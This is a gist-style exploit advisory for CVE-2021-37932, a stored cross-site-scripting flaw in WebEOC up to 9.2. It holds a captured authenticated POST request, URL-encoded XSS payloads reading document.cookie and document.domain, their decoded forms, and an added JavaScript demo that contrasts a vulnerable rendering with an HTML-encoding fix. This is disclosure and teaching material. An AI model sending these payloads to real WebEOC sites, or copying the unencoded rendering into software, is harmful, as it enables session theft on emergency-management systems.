@0xx7
Last active August 4, 2021 04:25
WebEOC 9.2 Stored Cross-Site-Scripting.txt
# Exploit Title: WebEOC Stored Cross-Site-Scripting <= 9.2
# Date: August/3/2021
# Exploit Author: Abdul Azeez Alaseeri
# Author page: https://www.linkedin.com/in/0xx777/
# Vendor Homepage: https://www.juvare.com/request-a-demo/webeoc/
# CVE-2021-37932
================================================================
WebEOC Stored Cross-Site-Scripting <= 9.2
================================================================
================================================================
Request (headers and body) start
================================================================
POST /eoc/boards/boardpost.aspx?displayviewid=&viewid=2640&tableid=570 HTTP/1.1
Host: Hidden
Cookie: webeoc.=!OCl+hYX/ZyfS0djPbUkHBjq03e8BYZoTS+yy9DZmbvKVQD7TAIv0po3/v7b6j0k7ynaG1sJmF0vbGgE=; TS011670b7=01eb724811d6c47111514ec4cb7c5b04c0d3904bab47b39c1868715f31e79083e3cca3405c872e8519c6686b7530d6eba1f532be1d; ASP.NET_SessionId=tsd0zspl5yoh0vf3vwae0fr5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------756200613402202119837915430
Content-Length: 15340
Origin: Hidden
Referer: https://Hidden/eoc/boards/boarddata.ashx?command=DATA&dataid=245123&incidentid=76&min=False&permlevel=-1&uvid=1.2470.419941&relateddataid=0&tableid=570&viewid=2640&pdfoptions=null&filter=%7B%7D&vparams=%5B%5D
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
-----------------------------756200613402202119837915430
Content-Disposition: form-data; name="CSRFToken"
**
-----------------------------756200613402202119837915430
Content-Disposition: form-data; name="_webeoc_hash_save"
**
-----------------------------756200613402202119837915430
Content-Disposition: form-data; name="weodate"
-----------------------------756200613402202119837915430
Content-Disposition: form-data; name="DescriptionHistory"
[{"DescriptionHistoryID":3,"ActionDate":"08/02/2021 15:03:02","UserName":"HIDDEN","PositionName":"Surveillance%20Admin","Description":"%22%3E%3Cimg%20src%3DX%20onerror%3Dalert(document.cookie)%3E"},{"DescriptionHistoryID":2,"ActionDate":"08/02/2021 15:03:02","UserName":"HIDDEN","PositionName":"Surveillance%20Admin","Description":"%22%3E%3Cimg%20src%3DX%20onerror%3Dalert(1)%3E"},{"DescriptionHistoryID":1,"ActionDate":"08/02/2021 14:54:58","UserName":"HIDDEN","PositionName":"Surveillance%20Admin","Description":"%3Ch1%3EAAA%3C%2Fh1%3EAAA"},{"DescriptionHistoryID":4,"ActionDate":"08/02/2021 15:03:02","UserName":"HIDDEN","PositionName":"Surveillance%20Admin","Description":"%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"},{"DescriptionHistoryID":5,"ActionDate":"08/02/2021 15:03:02","UserName":"HIDDEN","PositionName":"Surveillance%20Admin","Description":"%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"},{"DescriptionHistoryID":6,"ActionDate":"08/02/2021 15:03:02","UserName":"HIDDEN","PositionName":"Surveillance%20Admin","Description":"%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"}]
-----------------------------756200613402202119837915430
Content-Disposition: form-data; name="CheckCaseAcceptance"
Yes
-----------------------------756200613402202119837915430
Content-Disposition: form-data; name="cmdSave"
-----------------------------756200613402202119837915430
Content-Disposition: form-data; name="_weoc_savebuttonredirect"
================================================================
Request (headers and body) end
================================================================
In the response, I got a pop-up window for each payload, as shown in the screenshots:
https://drive.google.com/file/d/16SPXo7JKF9bLXKpdTCxr1MwBAJg9ruq-/view?usp=sharing
https://drive.google.com/file/d/1Ibd7V_34iy3dVUMx6t0Trclsr9aGhVYr/view?usp=sharing
Payloads (URL-encoded, exactly as stored in the "Description" values of the DescriptionHistory JSON; the decoded form each one renders as follows it):
%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E
    decodes to: "><img src=x onerror=alert(document.domain)>
%22%3E%3Cimg%20src%3DX%20onerror%3Dalert(document.cookie)%3E
    decodes to: "><img src=X onerror=alert(document.cookie)>
%22%3E%3Cimg%20src%3DX%20onerror%3Dalert(1)%3E
    decodes to: "><img src=X onerror=alert(1)>
The leading %22%3E ('">') is the part that closes the quoted attribute the description is written into, so the <img> element that follows is parsed as page markup and its onerror handler runs when the stored description is viewed.
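The attribute break-out these payloads depend on, as an added example that is not part of the advisory and is not WebEOC's or Juvare's code. It assumes, based only on the leading %22%3E in the payloads, that the stored description is URL-decoded and written into a quoted HTML attribute without output encoding (the real WebEOC template is not shown above). The DescriptionHistory sample is constructed to match the shape of the field in the request, and every function name is hypothetical:

```javascript
// Added example (not from the advisory or from Juvare/WebEOC): it reproduces
// the attribute-context break-out that the "%22%3E..." payloads rely on and
// shows the output-encoding fix. The sample below is constructed to match the
// shape of the DescriptionHistory field in the request above; all function
// names are hypothetical.

// Constructed DescriptionHistory value: descriptions are URL-encoded, as in
// the advisory's multipart body.
const SAMPLE_HISTORY = JSON.stringify([
  { DescriptionHistoryID: 1, ActionDate: "08/02/2021 14:54:58", UserName: "user",
    PositionName: "Surveillance%20Admin", Description: "%3Ch1%3EAAA%3C%2Fh1%3EAAA" },
  { DescriptionHistoryID: 2, ActionDate: "08/02/2021 15:03:02", UserName: "user",
    PositionName: "Surveillance%20Admin",
    Description: "%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E" },
]);

// Parse the JSON and URL-decode each description, which is what the
// rendering side has to do before it can display the stored text.
function parseHistory(json) {
  return JSON.parse(json).map((entry) => ({
    ...entry,
    Description: decodeURIComponent(entry.Description),
  }));
}

// Vulnerable rendering (assumed shape): the decoded description is
// concatenated straight into a quoted attribute. A description beginning
// with '">' closes the attribute and the tag, so everything after it is
// parsed as new markup.
function renderVulnerable(entries) {
  return entries
    .map((e) => `<input type="text" value="${e.Description}">`)
    .join("\n");
}

// Fix: encode the five HTML-significant characters before insertion. The
// '"' in the payload becomes &quot; and can no longer close the attribute.
function htmlEncode(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderSafe(entries) {
  return entries
    .map((e) => `<input type="text" value="${htmlEncode(e.Description)}">`)
    .join("\n");
}

// Minimal tag scanner that respects quoted attribute values, so "<h1>" sitting
// inside a quoted attribute is not counted as a tag, while the '">' break-out
// yields a real <img> element. Used to compare the two renderings above.
function tagNames(html) {
  const names = [];
  let i = 0;
  while (i < html.length) {
    if (html[i] !== "<") { i += 1; continue; }
    const m = /^<\/?([a-zA-Z][a-zA-Z0-9]*)/.exec(html.slice(i));
    if (!m) { i += 1; continue; }
    names.push(m[1].toLowerCase());
    i += m[0].length;
    let quote = null;
    while (i < html.length) {
      const c = html[i];
      i += 1;
      if (quote) { if (c === quote) quote = null; }
      else if (c === '"' || c === "'") quote = c;
      else if (c === ">") break;
    }
  }
  return names;
}

// Stand-alone run: show which tags each rendering produces.
const demoEntries = parseHistory(SAMPLE_HISTORY);
console.log("vulnerable:", tagNames(renderVulnerable(demoEntries))); // [ 'input', 'input', 'img' ]
console.log("safe:      ", tagNames(renderSafe(demoEntries)));       // [ 'input', 'input' ]
```

Run it with node. The first history entry (<h1>AAA</h1>AAA) stays inside the quoted attribute even in the vulnerable rendering, which is why the payloads that actually fire all start with the '">' prefix; assigning the vulnerable string to innerHTML in a browser would create the <img> and run its onerror handler, while the encoded version displays the text literally. Note also that the captured request carries a session cookie, a CSRFToken field and a _webeoc_hash_save field, so posting the payload requires an authenticated position with write access to the board; the impact is against other users who later view the stored description.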